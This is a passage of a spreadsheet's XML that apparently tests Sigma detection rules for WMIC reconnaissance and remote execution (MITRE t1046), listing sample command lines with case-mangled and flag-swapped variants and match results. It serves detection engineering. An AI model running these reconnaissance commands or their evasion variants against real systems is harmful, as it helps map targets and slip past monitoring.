    <row r="4157" ht="15.75" customHeight="1" s="42">
      <c r="A4157" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4157" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C4157" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4157" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E4157" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F4157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4157" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4157" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4157" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4157" s="43" t="n"/>
      <c r="K4157" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4158" ht="15.75" customHeight="1" s="42">
      <c r="A4158" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4158" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4158" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4158" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4158" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -c "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4158" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4158" s="43" t="n"/>
      <c r="J4158" s="43" t="n"/>
      <c r="K4158" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4159" ht="15.75" customHeight="1" s="42">
      <c r="A4159" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4159" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4159" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4159" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4159" s="43" t="inlineStr">
        <is>
          <t>powershell -NOprOFiLE /"Command" "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4159" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4159" s="43" t="n"/>
      <c r="J4159" s="43" t="n"/>
      <c r="K4159" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4160" ht="15.75" customHeight="1" s="42">
      <c r="A4160" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4160" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4160" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4160" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4160" s="43" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -"Command" "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4160" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4160" s="43" t="n"/>
      <c r="J4160" s="43" t="n"/>
      <c r="K4160" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4161" ht="15.75" customHeight="1" s="42">
      <c r="A4161" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4161" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4161" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4161" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4161" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -"Command" "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4161" s="43" t="n"/>
      <c r="J4161" s="43" t="n"/>
      <c r="K4161" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4162" ht="15.75" customHeight="1" s="42">
      <c r="A4162" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4162" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4162" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4162" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4162" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" /"Command" "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4162" s="43" t="n"/>
      <c r="J4162" s="43" t="n"/>
      <c r="K4162" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4163" ht="15.75" customHeight="1" s="42">
      <c r="A4163" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4163" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C4163" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4163" s="43" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E4163" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -cOMMaNd "Get-WmiObject -Class Win32_Service -Filter " Name='spooler'""</t>
        </is>
      </c>
      <c r="F4163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4163" s="43" t="n"/>
      <c r="J4163" s="43" t="n"/>
      <c r="K4163" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4164" ht="15.75" customHeight="1" s="42">
      <c r="A4164" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4164" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4164" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4164" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4164" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" /namespace:\root\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode /format:csv</t>
        </is>
      </c>
      <c r="F4164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4164" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4164" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4164" s="43" t="n"/>
      <c r="K4164" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4165" ht="15.75" customHeight="1" s="42">
      <c r="A4165" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4165" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4165" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4165" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4165" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" /namespace:\root\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F4165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4165" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4165" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4165" s="43" t="n"/>
      <c r="K4165" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4166" ht="15.75" customHeight="1" s="42">
      <c r="A4166" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4166" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4166" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4166" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4166" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nODE:"LOcALHOST" /nAmesPACe:\ROoT\cimV2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F4166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4166" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4166" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4166" s="43" t="n"/>
      <c r="K4166" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4167" ht="15.75" customHeight="1" s="42">
      <c r="A4167" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4167" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4167" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4167" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4167" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /NoDe:"locaLhOst" /namEspAcE:\Root\ciMV2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F4167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4167" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4167" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4167" s="43" t="n"/>
      <c r="K4167" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4168" ht="15.75" customHeight="1" s="42">
      <c r="A4168" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4168" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4168" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4168" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4168" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" -"namespace:\root\cimv2" path Win32_Service get Name,DisplayName,PathName,StartMode /"format:csv"</t>
        </is>
      </c>
      <c r="F4168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4168" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4168" s="43" t="n"/>
      <c r="K4168" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4169" ht="15.75" customHeight="1" s="42">
      <c r="A4169" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4169" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4169" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4169" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4169" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" -"namespace:\root\cimv2" path Win32_Service get Name,DisplayName,PathName,StartMode /FormAT:CSv</t>
        </is>
      </c>
      <c r="F4169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4169" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4169" s="43" t="n"/>
      <c r="K4169" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4170" ht="15.75" customHeight="1" s="42">
      <c r="A4170" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4170" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4170" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4170" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4170" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /"node:"localhost"" /namespace:\root\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F4170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4170" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4170" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae)</t>
        </is>
      </c>
      <c r="J4170" s="43" t="n"/>
      <c r="K4170" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4171" ht="15.75" customHeight="1" s="42">
      <c r="A4171" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4171" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4171" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4171" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4171" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nODe:"lOcalhosT" /nAMESpAcE:\ROOt\Cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode /"format:csv"</t>
        </is>
      </c>
      <c r="F4171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4171" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4171" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4171" s="43" t="n"/>
      <c r="K4171" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4172" ht="15.75" customHeight="1" s="42">
      <c r="A4172" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4172" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C4172" s="43" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4172" s="43" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E4172" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /NOde:"LoCALhoST" /nAMesPace:\rOot\CImv2 path Win32_Service get Name,DisplayName,PathName,StartMode /fOrMAt:Csv</t>
        </is>
      </c>
      <c r="F4172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4172" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4172" s="43" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE (76f55eaa-d27f-4213-9d45-7b0e4b60bbae); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4172" s="43" t="n"/>
      <c r="K4172" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4173" ht="15.75" customHeight="1" s="42">
      <c r="A4173" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4173" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C4173" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4173" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E4173" s="43" t="inlineStr">
        <is>
          <t>wmic.exe fsdir where "drive='C:'" get name,filesize</t>
        </is>
      </c>
      <c r="F4173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4173" s="43" t="n"/>
      <c r="J4173" s="43" t="n"/>
      <c r="K4173" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4174" ht="15.75" customHeight="1" s="42">
      <c r="A4174" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C4174" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4174" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E4174" s="43" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk list brief</t>
        </is>
      </c>
      <c r="F4174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4174" s="43" t="n"/>
      <c r="J4174" s="43" t="n"/>
      <c r="K4174" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4175" ht="15.75" customHeight="1" s="42">
      <c r="A4175" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4175" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C4175" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4175" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E4175" s="43" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F4175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4175" s="43" t="n"/>
      <c r="J4175" s="43" t="n"/>
      <c r="K4175" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4176" ht="15.75" customHeight="1" s="42">
      <c r="A4176" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4176" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C4176" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4176" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E4176" s="43" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F4176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4176" s="43" t="n"/>
      <c r="J4176" s="43" t="n"/>
      <c r="K4176" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4177" ht="15.75" customHeight="1" s="42">
      <c r="A4177" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4177" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4177" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4177" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4177" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F4177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4177" s="43" t="n"/>
      <c r="J4177" s="43" t="n"/>
      <c r="K4177" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4178" ht="15.75" customHeight="1" s="42">
      <c r="A4178" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4178" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4178" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4178" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4178" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F4178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4178" s="43" t="n"/>
      <c r="J4178" s="43" t="n"/>
      <c r="K4178" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4179" ht="15.75" customHeight="1" s="42">
      <c r="A4179" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4179" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4179" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4179" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4179" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class Win32_Process -ComputerName 192.168.1.100"</t>
        </is>
      </c>
      <c r="F4179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4179" s="43" t="n"/>
      <c r="J4179" s="43" t="n"/>
      <c r="K4179" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4180" ht="15.75" customHeight="1" s="42">
      <c r="A4180" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4180" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4180" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4180" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4180" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /"node:127.0.0.1" process list</t>
        </is>
      </c>
      <c r="F4180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4180" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4180" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4180" s="43" t="n"/>
      <c r="K4180" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4181" ht="15.75" customHeight="1" s="42">
      <c r="A4181" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4181" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4181" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4181" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4181" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /NodE:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F4181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4181" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4181" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4181" s="43" t="n"/>
      <c r="K4181" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4182" ht="15.75" customHeight="1" s="42">
      <c r="A4182" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4182" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4182" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4182" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
